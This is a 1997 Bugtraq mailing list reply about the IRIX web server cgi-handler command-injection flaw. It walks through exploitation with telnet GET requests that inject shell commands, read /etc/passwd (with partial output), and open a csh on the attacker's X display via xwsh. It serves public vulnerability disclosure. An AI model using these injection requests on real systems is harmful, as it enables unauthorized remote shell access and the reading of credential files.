Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: balu () STUDST FH-MUENSTER DE (Thomas Walter)
Date: Thu, 24 Jul 1997 17:51:56 +0200
Hiho... [Corinne Posse Relaeses wrote]
Quite a while ago, Razvan Dragomirescu (drazvan () kappa ro) released a report on the default cgi-handler scripts that ship with IRIX systems with web servers, and some other web server programs. Just like with the phf bug, with the cgi-handler bug a malicious user could start an xterm from the server machine on their own system. Example: telnet www.highly.respectable.bank.com 80 Trying 300.300.300.1... Connected to www.highly.respectable.bank.com Escape character is '^]'. GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download Please note the format of the "GET" query. The above assumes xwsh is in the PATH somewhere, and the "space" between "xwsh" and "-display" sould be a TAB.
I've got some problems while trying that... First it seems, that the xwsh was not in the path so I tried to call xwsh with a given path (note that all whitespaces after GET /cgi-bin/handler/ must be Tabs...): enemy% telnet victim 80 Trying 1.2.3.4... Connected to victim. Escape character is '^]'. GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download UX:sh (sh): ERROR: Connection closed by foreign host. enemy% That opened the xwsh window... But there was only one error-message in the first line: /usr/sbin/xwsh: Permission denied: can't start command Hm - What could that be? Doesn't matter - Lets see what I can do with other commands... (Remember the tabs...) enemy% telnet victim 80 Trying 1.2.3.4... Connected to victim. Escape character is '^]'. GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh [... I wont give you that ;) ...] nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null [... and again some more ...] Connection closed by foreign host. Hm - a shadowed passwd... was my first thought... Lets see If I can get the shadow... [As above] - Didnt work. So It seems that the WWWserver was not running as root (what a pity ;). If it does not run as root - it usually runs as nobody. And what can we see above? Nobody got the shell /dev/null - thats why my xwsh was not able to start a command. Next Try was to give xwsh the command that it should start... (And again: Tabs! - and of course everything in one line...) enemy% telnet victim 80 Trying 1.2.3.4... Connected to victim. Escape character is '^]'. GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download UX:sh (sh): ERROR: Connection closed by foreign host. enemy% And voila! - What else do you want? Any other programs to start? Just try... Brgds Balu -- /'^'\ Please note: english is not my mother tongue ( o o ) -------------------------------------------------------oOOO--(_)--OOOo E-Mail: balu () studst fh-muenster de Snail Mail: Thomas Walter Wemhoefer Stiege 10a, 48565 Burgsteinfurt .oooO or Broxtermannstr.12, 49082 Osnabrueck, GERMANY( ) Oooo. ---------------------------------------------------------\ (----( )- \_) ) / (_/
Current thread:
- Re: CPSR 7: IRIX WWW Server Thomas Walter (Jul 24)
- Re: CPSR 7: IRIX WWW Server Aaron Bornstein (Jul 24)
- Security hole in mgetty+sendfax Gert Doering (Jul 24)
- BIND Nuking Aveek Datta (Jul 24)
- Re: BIND Nuking Thomas H. Ptacek (Jul 29)
- ANNOUNCE: inn-1.5.1sec (fwd) Christopher Samuel (Jul 30)
- Re: Security hole in mgetty+sendfax Gert Doering (Jul 25)
- BIND Nuking Nicolas Dubee (Jul 25)
- Re: your mail Ariel Biener (Jul 25)
- Re: request-route Zoltan Hidvegi (Jul 28)
- Re: request-route Eric Bennett (Jul 29)
- BIND Nuking Aveek Datta (Jul 24)